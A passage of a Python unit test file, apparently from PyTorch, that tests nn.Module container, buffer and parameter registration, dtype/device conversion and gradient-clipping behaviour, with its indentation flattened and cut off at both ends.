module.train(error_mode)
def test_dir(self):
linear = nn.Linear(2, 2)
linear._test_submodule = nn.Linear(2, 2)
linear._test_parameter = Parameter(torch.empty(2, 2))
linear.register_buffer('_test_buffer', torch.empty(2, 2))
keys = dir(linear)
self.assertIn('_test_submodule', keys)
self.assertIn('_test_parameter', keys)
self.assertIn('_test_buffer', keys)
for key in keys:
self.assertTrue(hasattr(linear, key))
def test_repr(self):
# no extra information or sub-modules
empty_sequential = nn.Sequential()
expected_repr_empty = 'Sequential()'
self.assertEqual(repr(empty_sequential), expected_repr_empty)
# one liner extra information
linear = nn.Linear(1, 1)
expected_repr_linear = 'Linear(in_features=1, out_features=1, bias=True)'
self.assertEqual(repr(linear), expected_repr_linear)
# sub-modules repr
sequential = nn.Sequential(linear)
expected_repr_sequential = 'Sequential(\n' \
' (0): Linear(in_features=1, out_features=1, bias=True)\n' \
')'
self.assertEqual(repr(sequential), expected_repr_sequential)
def test_dir_digit(self):
model = nn.Sequential(nn.Linear(2, 2))
keys = dir(model)
self.assertNotIn('0', keys)
def test_named_children(self):
l1 = nn.Linear(2, 2)
l2 = nn.Linear(2, 2)
l3 = nn.Linear(2, 2)
l4 = nn.Linear(2, 2)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential()
with self.assertRaises(KeyError):
s.add_module('', l1)
with self.assertRaises(KeyError):
s.add_module('name.with.dot', l1)
s.add_module('layer1', l1)
s.add_module('layer2', l2)
s.add_module('layer3', l1)
s.add_module('layer4', l2)
s.add_module('subnet', subnet)
self.assertEqual(list(s.named_children()), [('layer1', l1), ('layer2', l2), ('subnet', subnet)])
def test_modules(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = l
self.l2 = l
self.param = torch.empty(3, 5)
l = nn.Linear(10, 20)
n = Net()
s = nn.Sequential(n, n, n, n)
self.assertEqual(list(s.modules()), [s, n, l])
def test_named_modules(self):
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.l1 = l
self.l2 = l
self.param = torch.empty(3, 5)
self.block = block
l = nn.Linear(10, 20)
l1 = nn.Linear(10, 20)
l2 = nn.Linear(10, 20)
block = nn.Sequential()
block.add_module('linear1', l1)
block.add_module('linear2', l2)
n = Net()
s = nn.Sequential(n, n)
self.assertEqual(list(s.named_modules()), [('', s), ('0', n), ('0.l1', l),
('0.block', block), ('0.block.linear1', l1),
('0.block.linear2', l2)])
# test the option to not remove duplicate module instances
self.assertEqual(list(s.named_modules(remove_duplicate=False)), [
('', s), ('0', n), ('0.l1', l), ('0.l2', l),
('0.block', block), ('0.block.linear1', l1),
('0.block.linear2', l2),
('1', n), ('1.l1', l), ('1.l2', l),
('1.block', block), ('1.block.linear1', l1),
('1.block.linear2', l2)])
def test_register_buffer_raises_error_if_name_is_not_string(self):
m = nn.Module()
expected_error = 'buffer name should be a string. Got '
with self.assertRaisesRegex(TypeError, expected_error + 'int'):
m.register_buffer(1, torch.rand(5))
with self.assertRaisesRegex(TypeError, expected_error + 'NoneType'):
m.register_buffer(None, torch.rand(5))
def test_register_buffer_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
del m.attribute_name
m.register_parameter('attribute_name', nn.Parameter())
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
del m.attribute_name
m.add_module('attribute_name', nn.Module())
with self.assertRaises(KeyError):
m.register_buffer('attribute_name', torch.rand(5))
def test_register_buffer_raises_error_if_not_tensor(self):
m = nn.Module()
with self.assertRaises(TypeError):
m.register_buffer('attribute_name', 5)
def test_register_buffer_allows_overwriting_with_same_name(self):
m = nn.Module()
buffer1 = torch.rand(5)
buffer2 = buffer1 + 5
buffer3 = None
m.register_buffer('buffer_name', buffer1)
self.assertEqual(m.buffer_name, buffer1)
m.register_buffer('buffer_name', buffer2)
self.assertEqual(m.buffer_name, buffer2)
m.register_buffer('buffer_name', buffer3)
self.assertEqual(m.buffer_name, buffer3)
def test_get_buffer(self):
m = nn.Module()
buffer1 = torch.randn(2, 3)
buffer2 = torch.randn(4, 5)
m.register_buffer('foo', buffer1)
m.register_buffer('bar', buffer2)
self.assertEqual(buffer1, m.get_buffer('foo'))
self.assertEqual(buffer2, m.get_buffer('bar'))
def test_get_buffer_from_submodules(self):
class MyModule(nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.sub = Sub(foo, bar)
class Sub(nn.Module):
def __init__(self, foo, bar):
super().__init__()
self.register_buffer('foo', foo)
self.subsub = SubSub(bar)
class SubSub(nn.Module):
def __init__(self, bar):
super().__init__()
self.register_buffer('bar', bar)
foo = torch.randn(2, 3)
bar = torch.randn(4, 5)
m = MyModule(foo, bar)
self.assertEqual(foo, m.get_buffer('sub.foo'))
self.assertEqual(bar, m.get_buffer('sub.subsub.bar'))
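# Buffers registered with persistent=False still show up in buffers() but
# are excluded from state_dict(), and load_state_dict() does not expect them.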
def test_buffer_not_persistent(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
def test_buffer_not_persistent_del(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
del m.buf
self.assertTrue(len(list(m.buffers())) == 0)
def test_buffer_not_persistent_overwrite(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
m.register_buffer('buf', torch.rand(5))
# Overwriting a non-persistent buffer with a persistent one: still one buffer, now in state_dict.
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 1)
# Overwriting a persistent buffer with a non-persistent one: still one buffer, gone from state_dict.
m.register_buffer('buf', torch.rand(5), persistent=False)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
def test_buffer_not_persistent_assign(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
# Assigning None removes the buffer but if we then assign a new Tensor
# to the same property, it should still be marked as a buffer.
m.buf = None
self.assertTrue(len(list(m.buffers())) == 0)
self.assertTrue(len(m.state_dict()) == 0)
m.buf = torch.rand(5)
self.assertTrue(len(list(m.buffers())) == 1)
self.assertTrue(len(m.state_dict()) == 0)
# Assigning a Parameter removes the buffer.
m.buf = nn.Parameter(torch.rand(5))
self.assertTrue(len(list(m.buffers())) == 0)
self.assertTrue(len(m.state_dict()) == 1)
def test_buffer_not_persistent_load(self):
m = nn.Module()
m.register_buffer('buf', torch.rand(5), persistent=False)
m.load_state_dict({})
def test_register_parameter_raises_error_if_name_is_not_string(self):
m = nn.Module()
expected_error = 'parameter name should be a string. Got '
with self.assertRaisesRegex(TypeError, expected_error + 'int'):
m.register_parameter(1, nn.Parameter())
with self.assertRaisesRegex(TypeError, expected_error + 'NoneType'):
m.register_parameter(None, nn.Parameter())
def test_register_parameter_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
del m.attribute_name
m.register_buffer('attribute_name', torch.rand(5))
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
del m.attribute_name
m.add_module('attribute_name', nn.Module())
with self.assertRaises(KeyError):
m.register_parameter('attribute_name', nn.Parameter())
def test_register_parameter_allows_overwriting_with_same_name(self):
m = nn.Module()
param1 = nn.Parameter(torch.rand(5))
param2 = nn.Parameter(param1.data + 5)
param3 = None
m.register_parameter('param_name', param1)
self.assertEqual(m.param_name, param1)
m.register_parameter('param_name', param2)
self.assertEqual(m.param_name, param2)
m.register_parameter('param_name', param3)
self.assertEqual(m.param_name, param3)
def test_add_module_raises_error_if_attr_exists(self):
m = nn.Module()
m.attribute_name = 5
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
del m.attribute_name
m.register_buffer('attribute_name', torch.rand(5))
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
del m.attribute_name
m.register_parameter('attribute_name', nn.Parameter())
with self.assertRaises(KeyError):
m.add_module('attribute_name', nn.Module())
@unittest.expectedFailure
def test_getattr_with_property(self):
class Model(nn.Module):
@property
def some_property(self):
return self.something_that_doesnt_exist
model = Model()
with self.assertRaisesRegex(
AttributeError,
r"'Model' object has no attribute 'something_that_doesnt_exist'"):
model.some_property
def test_Sequential_getitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3, l4)
self.assertIs(n[0], l1)
self.assertIs(n[1], l2)
self.assertIs(n[2], l3)
self.assertIs(n[3], l4)
self.assertIs(n[torch.tensor(3, dtype=torch.int64)], l4)
self.assertEqual(n[1:], nn.Sequential(l2, l3, l4))
self.assertEqual(n[3:], nn.Sequential(l4))
self.assertEqual(n[:-1], nn.Sequential(l1, l2, l3))
self.assertEqual(n[:-3], nn.Sequential(l1))
self.assertEqual(n[::-1], nn.Sequential(l4, l3, l2, l1))
def test_Sequential_setitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3)
n[0] = l4
n[-1] = l4
n[torch.tensor(1, dtype=torch.int16)] = l1
self.assertIs(n[0], l4)
self.assertIs(n[1], l1)
self.assertIs(n[2], l4)
def test_Sequential_setitem_named(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(OrderedDict([
('linear1', l1),
('linear2', l2),
('linear3', l3),
]))
n[0] = l4
n[-1] = l4
self.assertEqual(n.linear1, l4)
self.assertEqual(n.linear3, l4)
def test_Sequential_delitem(self):
l1 = nn.Linear(10, 20)
l2 = nn.Linear(20, 30)
l3 = nn.Linear(30, 40)
l4 = nn.Linear(40, 50)
n = nn.Sequential(l1, l2, l3, l4)
del n[-1]
self.assertEqual(n, nn.Sequential(l1, l2, l3))
del n[1::2]
self.assertEqual(n, nn.Sequential(l1, l3))
def test_ModuleList(self):
modules = [nn.ReLU(), nn.Linear(5, 5)]
module_list = nn.ModuleList(modules)
def check():
self.assertEqual(len(module_list), len(modules))
for m1, m2 in zip(modules, module_list):
self.assertIs(m1, m2)
for m1, m2 in zip(modules, module_list.children()):
self.assertIs(m1, m2)
for i in range(len(modules)):
self.assertIs(module_list[i], modules[i])
check()
modules += [nn.Conv2d(3, 4, 3)]
module_list += [modules[-1]]
check()
modules.insert(1, nn.Linear(3, 2))
module_list.insert(1, modules[1])
check()
modules.append(nn.Tanh())
module_list.append(modules[-1])
check()
next_modules = [nn.Linear(5, 5), nn.Sigmoid()]
modules.extend(next_modules)
module_list.extend(next_modules)
check()
modules[2] = nn.Conv2d(5, 3, 2)
module_list[2] = modules[2]
check()
modules[-1] = nn.Conv2d(5, 2, 1)
module_list[-1] = modules[-1]
check()
idx = torch.tensor(2, dtype=torch.int32)
modules[2] = nn.Conv2d(5, 3, 2)
module_list[idx] = modules[2]
self.assertIs(module_list[idx], modules[2])
check()
self.assertEqual(module_list[1:], nn.ModuleList(modules[1:]))
self.assertEqual(module_list[3:], nn.ModuleList(modules[3:]))
self.assertEqual(module_list[:-1], nn.ModuleList(modules[:-1]))
self.assertEqual(module_list[:-3], nn.ModuleList(modules[:-3]))
self.assertEqual(module_list[::-1], nn.ModuleList(modules[::-1]))
del module_list[-1]
self.assertEqual(module_list, nn.ModuleList(modules[:-1]))
del module_list[1::2]
self.assertEqual(module_list, nn.ModuleList(modules[:-1][0::2]))
with self.assertRaises(TypeError):
module_list += nn.ReLU()
with self.assertRaises(TypeError):
module_list.extend(nn.ReLU())
l1 = nn.Linear(1, 2)
l2 = nn.Linear(2, 3)
l3 = nn.Linear(3, 2)
l4 = nn.Linear(2, 3)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(
OrderedDict([
("layer1", l1),
("layer2", l2),
("layer3", l3),
("layer4", l4),
("subnet_layer", subnet)
])
)
modules = list(s.modules())
module_list = nn.ModuleList()
module_list.extend(s.modules())
check()
# verify the right exception is thrown when trying to "forward" through a ModuleList
self.assertRaises(NotImplementedError, module_list)
self.assertRaises(NotImplementedError, module_list, torch.rand(1, 3))
def test_ModuleDict(self):
modules = OrderedDict([
('act', nn.ReLU()),
('conv', nn.Conv2d(10, 10, 5)),
('fc', nn.Linear(5, 5)),
])
module_dict = nn.ModuleDict(modules)
def check():
self.assertEqual(len(module_dict), len(modules))
for k1, m2 in zip(modules, module_dict.children()):
self.assertIs(modules[k1], m2)
for k1, k2 in zip(modules, module_dict):
self.assertIs(modules[k1], module_dict[k2])
for k in module_dict:
self.assertIs(module_dict[k], modules[k])
for k in module_dict.keys():
self.assertIs(module_dict[k], modules[k])
for k, v in module_dict.items():
self.assertIs(modules[k], v)
for k1, m2 in zip(modules, module_dict.values()):
self.assertIs(modules[k1], m2)
for k in modules.keys():
self.assertTrue(k in module_dict)
check()
modules['conv'] = nn.Conv2d(3, 4, 3)
module_dict['conv'] = modules['conv']
check()
next_modules = [
('fc2', nn.Linear(5, 5)),
('act', nn.Sigmoid()),
]
modules.update(next_modules)
module_dict.update(next_modules)
check()
next_modules = OrderedDict([
('fc3', nn.Linear(5, 5)),
('act2', nn.Sigmoid()),
])
modules.update(next_modules)
module_dict.update(next_modules)
check()
next_modules = {
'fc4': nn.Linear(5, 5),
'act3': nn.Sigmoid()
}
modules.update(next_modules.items())
module_dict.update(next_modules)
check()
next_modules = nn.ModuleDict([
('fc5', nn.Linear(5, 5)),
('act4', nn.Sigmoid()),
])
modules.update(next_modules)
module_dict.update(next_modules)
check()
del module_dict['fc']
del modules['fc']
check()
with self.assertRaises(TypeError):
module_dict.update(nn.ReLU())
with self.assertRaises(TypeError):
module_dict.update([nn.ReLU()])
with self.assertRaises(ValueError):
module_dict.update([[nn.ReLU()]])
with self.assertRaises(TypeError):
module_dict[1] = nn.ReLU()
s = nn.Sequential(modules)
module_dict = nn.ModuleDict(s.named_children())
check()
c = module_dict.pop('conv')
self.assertIs(c, modules['conv'])
modules.pop('conv')
check()
module_dict.clear()
self.assertEqual(len(module_dict), 0)
modules.clear()
check()
# verify the right exception is thrown when trying to "forward" through a ModuleDict
self.assertRaises(NotImplementedError, module_dict)
self.assertRaises(NotImplementedError, module_dict, torch.rand(1, 3))
def test_ParameterList(self):
def make_param():
return Parameter(torch.randn(10, 10))
parameters = [make_param(), make_param()]
param_list = nn.ParameterList(parameters)
def check():
self.assertEqual(len(parameters), len(param_list))
for p1, p2 in zip(parameters, param_list):
self.assertIs(p1, p2)
for p1, p2 in zip(parameters, param_list.parameters()):
self.assertIs(p1, p2)
for i in range(len(parameters)):
self.assertIs(parameters[i], param_list[i])
check()
parameters += [make_param()]
param_list += [parameters[-1]]
check()
parameters.append(make_param())
param_list.append(parameters[-1])
check()
next_params = [make_param(), make_param()]
parameters.extend(next_params)
param_list.extend(next_params)
check()
parameters[2] = make_param()
param_list[2] = parameters[2]
check()
parameters[-1] = make_param()
param_list[-1] = parameters[-1]
check()
idx = torch.tensor(2, dtype=torch.int32)
parameters[2] = make_param()
param_list[idx] = parameters[2]
self.assertIs(param_list[idx], parameters[2])
check()
self.assertEqual(param_list[1:], nn.ParameterList(parameters[1:]))
self.assertEqual(param_list[3:], nn.ParameterList(parameters[3:]))
self.assertEqual(param_list[:-1], nn.ParameterList(parameters[:-1]))
self.assertEqual(param_list[:-3], nn.ParameterList(parameters[:-3]))
self.assertEqual(param_list[::-1], nn.ParameterList(parameters[::-1]))
with self.assertRaises(TypeError):
param_list += make_param()
with self.assertRaises(TypeError):
param_list.extend(make_param())
l1 = nn.Linear(1, 2)
l2 = nn.Linear(2, 3)
l3 = nn.Linear(3, 2)
l4 = nn.Linear(2, 3)
subnet = nn.Sequential(l3, l4)
s = nn.Sequential(
OrderedDict([
("layer1", l1),
("layer2", l2),
("layer3", l3),
("layer4", l4),
("subnet_layer", subnet)
])
)
parameters = list(s.parameters())
param_list = nn.ParameterList()
param_list.extend(s.parameters())
check()
def test_ParameterDict(self):
parameters = OrderedDict([
('p1', Parameter(torch.randn(10, 10))),
('p2', Parameter(torch.randn(10, 10))),
('p3', Parameter(torch.randn(10, 10))),
])
parameter_dict = nn.ParameterDict(parameters)
def check():
self.assertEqual(len(parameter_dict), len(parameters))
for k1, m2 in zip(parameters, parameter_dict.parameters()):
self.assertIs(parameters[k1], m2)
for k1, k2 in zip(parameters, parameter_dict):
self.assertIs(parameters[k1], parameter_dict[k2])
for k in parameter_dict:
self.assertIs(parameter_dict[k], parameters[k])
for k in parameter_dict.keys():
self.assertIs(parameter_dict[k], parameters[k])
for k, v in parameter_dict.items():
self.assertIs(v, parameters[k])
for k1, m2 in zip(parameters, parameter_dict.values()):
self.assertIs(parameters[k1], m2)
for k in parameters.keys():
self.assertTrue(k in parameter_dict)
check()
parameters['p4'] = Parameter(torch.randn(10, 10))
parameter_dict['p4'] = parameters['p4']
check()
next_parameters = [
('p5', Parameter(torch.randn(10, 10))),
('p2', Parameter(torch.randn(10, 10))),
]
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
next_parameters = OrderedDict([
('p6', Parameter(torch.randn(10, 10))),
('p5', Parameter(torch.randn(10, 10))),
])
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
next_parameters = {
'p8': Parameter(torch.randn(10, 10)),
'p7': Parameter(torch.randn(10, 10))
}
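# ParameterDict.update() sorts the keys of a plain (unordered) mapping, so
# the reference dict mirrors that ordering via sorted().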
parameters.update(sorted(next_parameters.items()))
parameter_dict.update(next_parameters)
check()
next_parameters = nn.ParameterDict([
('p10', Parameter(torch.randn(10, 10))),
('p9', Parameter(torch.randn(10, 10))),
])
parameters.update(next_parameters)
parameter_dict.update(next_parameters)
check()
del parameter_dict['p3']
del parameters['p3']
check()
with self.assertRaises(TypeError):
parameter_dict.update(1)
with self.assertRaises(TypeError):
parameter_dict.update([1])
with self.assertRaises(ValueError):
parameter_dict.update(Parameter(torch.randn(10, 10)))
with self.assertRaises(TypeError):
parameter_dict[1] = Parameter(torch.randn(10, 10))
p_pop = parameter_dict.pop('p4')
self.assertIs(p_pop, parameters['p4'])
parameters.pop('p4')
check()
parameter_dict.clear()
self.assertEqual(len(parameter_dict), 0)
parameters.clear()
check()
def test_add_module(self):
l = nn.Linear(10, 20)
net = nn.Module()
net.l = l
net.l2 = l
net.add_module('empty', None)
self.assertEqual(net.l, l)
self.assertEqual(net.l2, l)
self.assertEqual(net.empty, None)
net.add_module('l3', l)
self.assertEqual(net.l3, l)
l3 = nn.Linear(20, 10)
net.add_module('l', l3)
self.assertEqual(net.l, l3)
self.assertRaises(TypeError, lambda: net.add_module('x', 'non-module'))
self.assertRaisesRegex(TypeError, 'module name should be a string. Got int',
lambda: net.add_module(1, l))
self.assertRaisesRegex(TypeError, 'module name should be a string. Got NoneType',
lambda: net.add_module(None, l))
def test_module_to_argparse(self):
net = nn.Sequential(nn.Linear(3, 3))
cpu = torch.device('cpu')
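# Module.to() accepts to(device), to(dtype), to(tensor), or
# to(device, dtype[, non_blocking]), and the dtype must be floating point;
# every call below violates one of those constraints.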
with self.assertRaises(TypeError):
net.to(cpu, True)
with self.assertRaises(TypeError):
net.to(torch.long)
with self.assertRaises(TypeError):
net.to(None, True)
with self.assertRaises(TypeError):
net.to(cpu, torch.long, True)
with self.assertRaises(TypeError):
net.to(cpu, dtype=torch.long, non_blocking=True)
with self.assertRaises(TypeError):
net.to([])
with self.assertRaises(TypeError):
net.to({}, non_blocking=True)
with self.assertRaises(TypeError):
net.to(torch.tensor(3, dtype=torch.long), non_blocking=True)
with self.assertRaises(TypeError):
net.to(cpu, torch.tensor(3, dtype=torch.long), non_blocking=True)
def test_RNN_nonlinearity(self):
rnn = torch.nn.RNN(1, 10)
self.assertEqual(rnn.nonlinearity, 'tanh')
rnn = torch.nn.RNN(1, 10, nonlinearity='relu')
self.assertEqual(rnn.nonlinearity, 'relu')
with self.assertRaisesRegex(ValueError, 'Unknown nonlinearity'):
rnn = torch.nn.RNN(1, 10, nonlinearity='garbage')
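# Autograd tracks in-place modifications through a per-tensor version
# counter (tensor._version); backward raises if a tensor saved for the
# backward pass was modified in place after being saved.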
def test_module_apply_inplace_op(self):
def add_one_inplace(t):
return t.add_(1.0)
# Test that applying an in-place operation to a module would bump
# the module's parameters' version counter.
m = nn.Linear(20, 10)
pvm = m.weight.mul(m.weight)
m_weight_version_saved = m.weight._version
m = m._apply(add_one_inplace)
self.assertGreater(m.weight._version, m_weight_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pvm.backward(torch.randn(10, 20))
# Test that applying an in-place operation to a module would bump
# the module's parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
pgm = m.weight.grad.mul(m.weight.grad)
m_weight_grad_version_saved = m.weight.grad._version
m = m._apply(add_one_inplace)
self.assertGreater(m.weight.grad._version, m_weight_grad_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pgm.backward(torch.randn(10, 20))
def test_overwrite_module_params_on_conversion(self):
# Test that if the conversion function passed to `module._apply()`
# changes the TensorImpl type of `module`'s parameters, the `module`'s
# parameters are always overwritten, regardless of the value of
# `torch.__future__.get_overwrite_module_params_on_conversion()`.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20)
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m = m._apply(lambda t: torch.sparse_coo_tensor(torch.zeros([2, 1]), torch.ones([1]), torch.Size([10, 20])))
self.assertNotEqual(weight_ref.layout, m.weight.layout)
self.assertNotEqual(weight_grad_ref.layout, m.weight.grad.layout)
# Test that under the current default settings
# (`torch.__future__.get_overwrite_module_params_on_conversion() == False`),
# a view to a module's parameters is not pointing to the same storage as
# its base variable after converting the module to a different dtype.
m = nn.Linear(20, 10).float()
mw = m.weight[:]
m.double()
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0].dtype == torch.float)
self.assertTrue(mw._base[0][0].dtype == torch.double)
try:
torch.__future__.set_overwrite_module_params_on_conversion(True)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# a view to a module's parameters is still pointing to the same storage as
# its base variable after converting the module to a different dtype.
m = nn.Linear(20, 10).float()
mw = m.weight[:]
m.double()
with torch.no_grad():
mw[0][0] = 5
self.assertTrue(mw[0][0] == mw._base[0][0])
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# `float_module.double()` doesn't preserve previous references to
# `float_module`'s parameters or gradients.
m = nn.Linear(20, 10).float()
m.weight.grad = torch.randn(10, 20).float()
weight_ref = m.weight
weight_grad_ref = m.weight.grad
m.double()
self.assertNotEqual(weight_ref.dtype, m.weight.dtype)
self.assertNotEqual(weight_grad_ref.dtype, m.weight.grad.dtype)
def add_one_inplace(t):
return t.add_(1.0)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an in-place operation to a module would bump the module's
# original parameters' version counter.
m = nn.Linear(20, 10)
pvm = m.weight.mul(m.weight)
weight_ref = m.weight
m_weight_version_saved = weight_ref._version
m = m._apply(add_one_inplace)
# Test that the in-place operation bumps the original parameter's version counter
self.assertGreater(weight_ref._version, m_weight_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pvm.backward(torch.randn(10, 20))
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an in-place operation to a module would bump the module's
# original parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
pgm = m.weight.grad.mul(m.weight.grad)
weight_grad_ref = m.weight.grad
m_weight_grad_version_saved = weight_grad_ref._version
m = m._apply(add_one_inplace)
self.assertGreater(weight_grad_ref._version, m_weight_grad_version_saved)
with self.assertRaisesRegex(RuntimeError, "modified by an inplace operation"):
pgm.backward(torch.randn(10, 20))
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an out-of-place operation to a module doesn't bump
# the module's original parameters' version counter.
m = nn.Linear(20, 10)
weight_ref = m.weight
m_weight_version_saved = weight_ref._version
m = m._apply(lambda t: torch.randn(t.shape))
self.assertEqual(weight_ref._version, m_weight_version_saved)
# Test that if `torch.__future__.get_overwrite_module_params_on_conversion() == True`,
# applying an out-of-place operation to a module doesn't bump
# the module's original parameters' gradients' version counter.
m = nn.Linear(20, 10)
m.weight.grad = torch.randn(10, 20).requires_grad_()
weight_grad_ref = m.weight.grad
m_weight_grad_version_saved = weight_grad_ref._version
m = m._apply(lambda t: torch.randn(t.shape))
self.assertEqual(weight_grad_ref._version, m_weight_grad_version_saved)
finally:
torch.__future__.set_overwrite_module_params_on_conversion(False)
def test_type(self):
l = nn.Linear(10, 20)
net = nn.Module()
net.l = l
net.l2 = l
net.add_module('empty', None)
net.register_buffer('indices', torch.LongTensor(1))
net.float()
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.double()
self.assertIsInstance(l.weight.data, torch.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.DoubleTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to(torch.half)
self.assertIsInstance(l.weight.data, torch.HalfTensor)
self.assertIsInstance(l.bias.data, torch.HalfTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
if TEST_CUDA:
net.float().cuda()
self.assertIsInstance(l.weight.data, torch.cuda.FloatTensor)
self.assertIsInstance(l.bias.data, torch.cuda.FloatTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.cpu()
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to("cuda", torch.double, True)
self.assertIsInstance(l.weight.data, torch.cuda.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.cuda.DoubleTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.to(torch.empty(1, device="cuda:0", dtype=torch.half))
self.assertIsInstance(l.weight.data, torch.cuda.HalfTensor)
self.assertIsInstance(l.bias.data, torch.cuda.HalfTensor)
self.assertIsInstance(net.indices, torch.cuda.LongTensor)
net.to(torch.device("cpu"), non_blocking=True)
self.assertIsInstance(l.weight.data, torch.HalfTensor)
self.assertIsInstance(l.bias.data, torch.HalfTensor)
self.assertIsInstance(net.indices, torch.LongTensor)
net.to(torch.float)
self.assertIsInstance(l.weight.data, torch.FloatTensor)
self.assertIsInstance(l.bias.data, torch.FloatTensor)
net.to(torch.DoubleTensor(1))
self.assertIsInstance(l.weight.data, torch.DoubleTensor)
self.assertIsInstance(l.bias.data, torch.DoubleTensor)
if TEST_CUDA:
net.to(device='cuda', dtype=torch.float)
self.assertIsInstance(l.weight.data, torch.cuda.FloatTensor)
self.assertIsInstance(l.bias.data, torch.cuda.FloatTensor)
def test_non_leaf_parameters(self):
l1 = nn.Linear(10, 10)
l2 = nn.Linear(10, 10)
def assign_weight():
l2.weight = l1.weight + 2
self.assertRaises(TypeError, assign_weight)
# This should work though
l2.weight = Parameter(torch.randn(10, 10))
def test_clip_grad_norm(self):
l = nn.Linear(10, 10)
max_norm = 2
def compute_norm(norm_type):
norm_type = float(norm_type)
if norm_type != inf:
total_norm = 0
for p in l.parameters():
total_norm += p.grad.data.abs().pow(norm_type).sum()
return pow(total_norm, 1. / norm_type)
else:
return max(p.grad.data.abs().max() for p in l.parameters())
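# Clipping must scale all gradients by the same factor; a zero std of the
# per-element grad/original ratios confirms uniform scaling.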
def compare_scaling(grads):
p_scale = [p.grad.data.div(g).view(-1) for p, g in zip(l.parameters(), grads)]
scale = torch.cat(p_scale)
self.assertEqual(scale.std(), 0)
return scale[0]
grads = torch.arange(1., 101).view(10, 10), torch.ones(10).div(1000)
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
for p, g in zip(l.parameters(), grads):
p._grad = g.clone().view_as(p.data)
norm_before = compute_norm(norm_type)
norm = clip_grad_norm_(l.parameters(), max_norm, norm_type=norm_type)
norm_after = compute_norm(norm_type)
self.assertEqual(norm, norm_before)
self.assertEqual(norm_after, max_norm)
self.assertLessEqual(norm_after, norm_before)
compare_scaling(grads)
# Small gradients should be left unchanged
grads = torch.rand(10, 10).div(10000), torch.ones(10).div(500)
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
for p, g in zip(l.parameters(), grads):
p.grad.data.copy_(g)
norm_before = compute_norm(norm_type)
norm = clip_grad_norm_(l.parameters(), max_norm, norm_type=norm_type)
norm_after = compute_norm(norm_type)
self.assertEqual(norm, norm_before)
self.assertEqual(norm_before, norm_after)
self.assertLessEqual(norm_after, max_norm)
scale = compare_scaling(grads)
self.assertEqual(scale, 1)
# Should accept a single Tensor as input
p1, p2 = torch.randn(10, 10), torch.randn(10, 10)
g = torch.arange(1., 101).view(10, 10)
p1._grad = g.clone()
p2._grad = g.clone()
for norm_type in [0.5, 1.5, 2, 4, 'inf']:
clip_grad_norm_(p1, max_norm, norm_type=norm_type)
clip_grad_norm_([p2], max_norm, norm_type=norm_type)
self.assertEqual(p1.grad, p2.grad)
def test_clip_grad_value(self):
l = nn.Linear(10, 10)
clip_value = 2.5
grad_w, grad_b = torch.arange(-50., 50).view(10, 10).div_(5), torch.ones(10).mul_(2)
for grad_list in [[grad_w, grad_b], [grad_w, None]]:
for p, g in zip(l.parameters(), grad_list):
p._grad = g.clone().view_as(p.data) if g is not None else g
clip_grad_value_(l.parameters(), clip_value)
for p in filter(lambda p: p.grad is not None, l.parameters()):
